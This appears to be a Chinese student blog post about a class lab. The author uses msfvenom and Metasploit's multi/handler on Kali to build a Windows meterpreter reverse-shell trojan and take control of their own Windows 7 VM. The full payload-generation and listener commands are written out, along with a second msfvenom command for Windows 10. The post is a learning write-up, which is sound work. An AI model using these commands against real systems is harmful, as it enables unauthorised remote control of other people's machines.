使用msfvenom生成木马用于渗透虚拟机

使用msfvenom生成木马用于渗透虚拟机

背景

这两天网络安全老师要求我们利用自己的kali渗透自己的虚拟机，研究了两周才有了一点思路，大佬勿喷！！！

解决思路

1、首先使两台虚拟机拥有不同的ip地址，能够互相ping通，且能上网
因为我电脑内存16G，所以在主机win10上开了两台虚拟机（攻击机kali和靶机win7）
虚拟机都是安装在virtualbox上的，kali是官方正版，win7是在微软的官方虚拟机下载的（尽量别下载盗版ova文件，很容易出问题）

win7的ova下载链接
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

不会让两台虚拟机拥有不同的ip地址，能够互相ping通，且能上网的去我另一篇博客看，链接如下
https://blog.csdn.net/qq_41509200/article/details/100612523
2、打开win7
在这里把防火墙关了

在命令行下看看现在的ip，我现在的ip是192.168.43.66

然后顺便看看能不能ping通kali
3、打开kali
先看看kali的ip，我这里是192.168.43.147

然后在这里看看能不能ping通win7
ping通后，在kali的命令行下就利用如下代码生成一个木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.147 lport=4444 -f exe > shell.exe

然后把这个木马存到win7随便一个地方，接着用管理员身份打开它

下一步，在kali中依次运行如下命令

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.43.147
set lport 4444
exploit

最后，你会发现自己已经进入到了靶机win7的命令行。
4、翻车现场
但是，我有时候也会出现下面的情况

还是有好多大佬做出了解答，我在这里也列举两个，留着以后再进行深究：

• 重新启动一下 metesploit 的数据库
• windows 的版本问题

总结

1. 在 csdn 中，发现了在一台电脑上使两台虚拟机互相 ping 通需要将其网络连接方式设置为 桥接方式，而且不能连接校园网，有的大佬说是学校锐捷服务器的问题，所以我的主机连接 手机热点能解决互相 ping 不通的问题；
2. 按照别人写的博客进行过程复现，结果总是 Exploit completed, but no session was created. 在浏览器中搜索有人说让重写启动一下 metesploit 的数据库，还有人说是 windows 的版本问 题，反正我就成功渗透了 win7 一次，结果还忘了给截屏了，其他的全部以失败告终。
3. 攻击 win10 的时候，有人说要用 TheFatRat，我也尝试了好多次，终究没成功，好不容易 找到了利用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.168 LPORT =5555 shell > shell.exe 生成木马的博客，结果还是没拿下来，看来这次是搞不定了。